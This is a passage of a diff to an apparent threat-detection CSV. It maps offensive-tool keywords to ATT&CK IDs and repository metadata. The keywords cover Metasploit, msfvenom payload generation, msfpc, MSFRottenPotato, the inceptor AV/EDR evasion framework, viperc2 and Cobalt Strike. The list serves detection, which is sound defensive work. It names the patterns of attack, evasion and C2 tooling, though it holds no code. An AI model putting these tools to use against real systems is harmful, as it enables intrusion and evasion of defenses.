
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfdb --use-defaults*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfdb_helpers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfencode*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfJavaToolkit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole_spec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfcrawler.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfd.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --component*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --use-defaults*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb_helpers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfencode*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfJavaToolkit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msf-json-rpc.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*msf-json-rpc.ru*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msflag.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msf-json-rpc.ru*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msflag.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*MsfModule*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*msfmodule.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*MsfModuleAsFunction*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - 
T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*msfpattern.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfpayload*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfpc.sh*","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1127","274","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" -"*msfrelay.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msf-revhttps*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*MSFRottenPotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*MSFRottenPotato.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msf-sgn.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*msfupdate_spec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msfpattern.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpayload*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpc.sh*","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*msfrelay.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-revhttps*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*MSFRottenPotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MSFRottenPotato.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-sgn.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*msfupdate_spec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msfvemonpayload*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 